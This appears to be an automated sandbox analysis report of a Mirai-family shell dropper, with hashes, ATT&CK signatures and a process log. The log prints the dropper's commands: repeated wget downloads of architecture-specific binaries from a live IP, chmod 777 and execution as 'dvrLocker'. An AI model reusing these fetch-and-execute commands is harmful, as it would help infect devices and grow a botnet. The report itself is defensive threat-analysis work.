Analysis
- max time kernel: 15s
- max time network: 17s
- platform: debian-9_armhf
- resource: debian9-armhf-20240729-en
- resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 09-11-2024 03:32
Static task
static1
Behavioral task
behavioral1
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
-
Size
923B
-
MD5
5419b553750dc94cb55eecefce2e1950
-
SHA1
bf1c8a80bcecfe13f81279a0392031d661e736ef
-
SHA256
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
-
SHA512
fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid | process
801 | chmod
821 | chmod
871 | chmod
882 | chmod
928 | chmod
816 | chmod
860 | chmod
893 | chmod
938 | chmod
828 | chmod
838 | chmod
888 | chmod
903 | chmod
908 | chmod
913 | chmod
933 | chmod
948 | chmod
953 | chmod
810 | chmod
851 | chmod
898 | chmod
918 | chmod
923 | chmod
943 | chmod
-
Executes dropped EXE 24 IoCs
Processes:
ioc | pid | process
/tmp/lib/dvrLocker | 802 | dvrLocker
/tmp/lib/dvrLocker | 811 | dvrLocker
/tmp/lib/dvrLocker | 817 | dvrLocker
/tmp/lib/dvrLocker | 822 | dvrLocker
/tmp/lib/dvrLocker | 830 | dvrLocker
/tmp/lib/dvrLocker | 839 | dvrLocker
/tmp/lib/dvrLocker | 852 | dvrLocker
/tmp/lib/dvrLocker | 862 | dvrLocker
/mnt/dvrLocker | 873 | dvrLocker
/mnt/dvrLocker | 884 | dvrLocker
/mnt/dvrLocker | 889 | dvrLocker
/mnt/dvrLocker | 894 | dvrLocker
/mnt/dvrLocker | 899 | dvrLocker
/mnt/dvrLocker | 904 | dvrLocker
/mnt/dvrLocker | 909 | dvrLocker
/mnt/dvrLocker | 914 | dvrLocker
/mnt/dvrLocker | 919 | dvrLocker
/mnt/dvrLocker | 924 | dvrLocker
/mnt/dvrLocker | 929 | dvrLocker
/mnt/dvrLocker | 934 | dvrLocker
/mnt/dvrLocker | 939 | dvrLocker
/mnt/dvrLocker | 944 | dvrLocker
/mnt/dvrLocker | 949 | dvrLocker
/mnt/dvrLocker | 954 | dvrLocker
-
Processes:
description | ioc | process
File opened for reading | /proc/filesystems | ls
File opened for reading | /proc/filesystems | mkdir
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid | process
886 | rm
922 | wget
926 | rm
807 | wget
814 | rm
876 | wget
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description | ioc | process
File opened for modification | /tmp/lib/dvrLocker | becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes
pid | image | command line | signatures
660 | /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh | /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh | Writes file to tmp directory
  662 | /bin/ls | ls -l /proc/1/exe | Reads runtime system information
  668 | /bin/ls | ls -l /proc/10/exe | Reads runtime system information
  672 | /bin/ls | ls -l /proc/102/exe | Reads runtime system information
  675 | /bin/ls | ls -l /proc/11/exe | Reads runtime system information
  678 | /bin/ls | ls -l /proc/110/exe | Reads runtime system information
  683 | /bin/ls | ls -l /proc/112/exe | Reads runtime system information
  687 | /bin/ls | ls -l /proc/113/exe | Reads runtime system information
  690 | /bin/ls | ls -l /proc/12/exe | Reads runtime system information
  691 | /bin/ls | ls -l /proc/13/exe | Reads runtime system information
  694 | /bin/ls | ls -l /proc/14/exe | Reads runtime system information
  695 | /bin/ls | ls -l /proc/141/exe | Reads runtime system information
  698 | /bin/ls | ls -l /proc/142/exe | Reads runtime system information
  700 | /bin/ls | ls -l /proc/145/exe | Reads runtime system information
  702 | /bin/ls | ls -l /proc/15/exe | Reads runtime system information
  703 | /bin/ls | ls -l /proc/150/exe | Reads runtime system information
  704 | /bin/ls | ls -l /proc/156/exe | Reads runtime system information
  706 | /bin/ls | ls -l /proc/16/exe | Reads runtime system information
  707 | /bin/ls | ls -l /proc/17/exe | Reads runtime system information
  708 | /bin/ls | ls -l /proc/173/exe | Reads runtime system information
  709 | /bin/ls | ls -l /proc/18/exe | Reads runtime system information
  710 | /bin/ls | ls -l /proc/19/exe | Reads runtime system information
  711 | /bin/ls | ls -l /proc/2/exe
  712 | /bin/ls | ls -l /proc/20/exe | Reads runtime system information
  713 | /bin/ls | ls -l /proc/21/exe | Reads runtime system information
  714 | /bin/ls | ls -l /proc/212/exe | Reads runtime system information
  715 | /bin/ls | ls -l /proc/22/exe
  716 | /bin/ls | ls -l /proc/23/exe | Reads runtime system information
  717 | /bin/ls | ls -l /proc/24/exe | Reads runtime system information
  718 | /bin/ls | ls -l /proc/25/exe | Reads runtime system information
  719 | /bin/ls | ls -l /proc/26/exe | Reads runtime system information
  720 | /bin/ls | ls -l /proc/27/exe | Reads runtime system information
  721 | /bin/ls | ls -l /proc/272/exe | Reads runtime system information
  722 | /bin/ls | ls -l /proc/275/exe | Reads runtime system information
  723 | /bin/ls | ls -l /proc/276/exe | Reads runtime system information
  726 | /bin/ls | ls -l /proc/28/exe | Reads runtime system information
  727 | /bin/ls | ls -l /proc/287/exe | Reads runtime system information
  730 | /bin/ls | ls -l /proc/289/exe | Reads runtime system information
  731 | /bin/ls | ls -l /proc/29/exe | Reads runtime system information
  733 | /bin/ls | ls -l /proc/3/exe | Reads runtime system information
  735 | /bin/ls | ls -l /proc/306/exe | Reads runtime system information
  737 | /bin/ls | ls -l /proc/307/exe | Reads runtime system information
  739 | /bin/ls | ls -l /proc/316/exe | Reads runtime system information
  741 | /bin/ls | ls -l /proc/356/exe | Reads runtime system information
  743 | /bin/ls | ls -l /proc/4/exe | Reads runtime system information
  744 | /bin/ls | ls -l /proc/41/exe | Reads runtime system information
  747 | /bin/ls | ls -l /proc/42/exe | Reads runtime system information
  748 | /bin/ls | ls -l /proc/43/exe | Reads runtime system information
  750 | /bin/ls | ls -l /proc/5/exe | Reads runtime system information
  752 | /bin/ls | ls -l /proc/594/exe | Reads runtime system information
  754 | /bin/ls | ls -l /proc/6/exe | Reads runtime system information
  756 | /bin/ls | ls -l /proc/611/exe | Reads runtime system information
  757 | /bin/ls | ls -l /proc/612/exe | Reads runtime system information
  760 | /bin/ls | ls -l /proc/614/exe | Reads runtime system information
  761 | /bin/ls | ls -l /proc/615/exe | Reads runtime system information
  763 | /bin/ls | ls -l /proc/646/exe | Reads runtime system information
  765 | /bin/ls | ls -l /proc/652/exe | Reads runtime system information
  767 | /bin/ls | ls -l /proc/653/exe | Reads runtime system information
  769 | /bin/ls | ls -l /proc/655/exe | Reads runtime system information
  770 | /bin/ls | ls -l /proc/657/exe
  773 | /bin/ls | ls -l /proc/658/exe | Reads runtime system information
  774 | /bin/ls | ls -l /proc/659/exe | Reads runtime system information
  776 | /bin/ls | ls -l /proc/660/exe | Reads runtime system information
  778 | /bin/ls | ls -l /proc/661/exe
  780 | /bin/ls | ls -l /proc/7/exe | Reads runtime system information
  781 | /bin/ls | ls -l /proc/8/exe | Reads runtime system information
  783 | /bin/ls | ls -l /proc/80/exe | Reads runtime system information
  785 | /bin/ls | ls -l /proc/9/exe | Reads runtime system information
  789 | /bin/rm | rm -rf /tmp/lib/
  790 | /bin/rm | rm -rf /tmp/lib/dvrLocker
  791 | /bin/mkdir | mkdir /tmp/lib/ | Reads runtime system information
  793 | /usr/bin/wget | wget http://45.202.35.91/tmpsl -O -
  801 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  802 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  802 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  805 | /bin/rm | rm -rf tmpsl
  807 | /usr/bin/wget | wget http://45.202.35.91/tmips -O - | System Network Configuration Discovery
  810 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  811 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  811 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  814 | /bin/rm | rm -rf tmips | System Network Configuration Discovery
  815 | /usr/bin/wget | wget http://45.202.35.91/tarm -O -
  816 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  817 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  817 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  819 | /bin/rm | rm -rf tarm
  820 | /usr/bin/wget | wget http://45.202.35.91/tarm5 -O -
  821 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  822 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  822 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  825 | /bin/rm | rm -rf tarm5
  826 | /usr/bin/wget | wget http://45.202.35.91/tppc -O -
  828 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  830 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  830 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  832 | /bin/rm | rm -rf tppc
  833 | /usr/bin/wget | wget http://45.202.35.91/tarm7 -O -
  838 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  839 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  839 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  842 | /bin/rm | rm -rf tarm7
  843 | /usr/bin/wget | wget http://45.202.35.91/x86 -O -
  851 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  852 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  855 | /bin/rm | rm -rf x86
  856 | /usr/bin/wget | wget http://45.202.35.91/tarm6 -O -
  860 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  862 | /tmp/lib/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  862 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  865 | /bin/rm | rm -rf tarm6
  866 | /bin/rm | rm -rf /mnt/dvrLocker
  867 | /usr/bin/wget | wget http://45.202.35.91/tmpsl -O -
  871 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  873 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  873 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  875 | /bin/rm | rm -rf tmpsl
  876 | /usr/bin/wget | wget http://45.202.35.91/tmips -O - | System Network Configuration Discovery
  882 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  884 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  884 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  886 | /bin/rm | rm -rf tmips | System Network Configuration Discovery
  887 | /usr/bin/wget | wget http://45.202.35.91/tarm -O -
  888 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  889 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  889 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  891 | /bin/rm | rm -rf tarm
  892 | /usr/bin/wget | wget http://45.202.35.91/tarm5 -O -
  893 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  894 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  894 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  896 | /bin/rm | rm -rf tarm5
  897 | /usr/bin/wget | wget http://45.202.35.91/tppc -O -
  898 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  899 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  899 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  901 | /bin/rm | rm -rf tppc
  902 | /usr/bin/wget | wget http://45.202.35.91/tarm7 -O -
  903 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  904 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  904 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  906 | /bin/rm | rm -rf tarm7
  907 | /usr/bin/wget | wget http://45.202.35.91/x86 -O -
  908 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  909 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  911 | /bin/rm | rm -rf x86
  912 | /usr/bin/wget | wget http://45.202.35.91/tarm6 -O -
  913 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  914 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  914 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  916 | /bin/rm | rm -rf tarm6
  917 | /usr/bin/wget | wget http://45.202.35.91/tmpsl -O -
  918 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  919 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  919 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  921 | /bin/rm | rm -rf tmpsl
  922 | /usr/bin/wget | wget http://45.202.35.91/tmips -O - | System Network Configuration Discovery
  923 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  924 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  924 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  926 | /bin/rm | rm -rf tmips | System Network Configuration Discovery
  927 | /usr/bin/wget | wget http://45.202.35.91/tarm -O -
  928 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  929 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  929 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  931 | /bin/rm | rm -rf tarm
  932 | /usr/bin/wget | wget http://45.202.35.91/tarm5 -O -
  933 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  934 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  934 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  936 | /bin/rm | rm -rf tarm5
  937 | /usr/bin/wget | wget http://45.202.35.91/tppc -O -
  938 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  939 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  939 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  941 | /bin/rm | rm -rf tppc
  942 | /usr/bin/wget | wget http://45.202.35.91/tarm7 -O -
  943 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  944 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  944 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  946 | /bin/rm | rm -rf tarm7
  947 | /usr/bin/wget | wget http://45.202.35.91/x86 -O -
  948 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  949 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  951 | /bin/rm | rm -rf x86
  952 | /usr/bin/wget | wget http://45.202.35.91/tarm6 -O -
  953 | /bin/chmod | chmod 777 dvrLocker | File and Directory Permissions Modification
  954 | /mnt/dvrLocker | ./dvrLocker tplink.new | Executes dropped EXE
  954 | /bin/sh | /bin/sh ./dvrLocker tplink.new
  956 | /bin/rm | rm -rf tarm6
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
93KB
MD5
bb9275394716c60d1941432c7085ca13
SHA1
43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512
047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d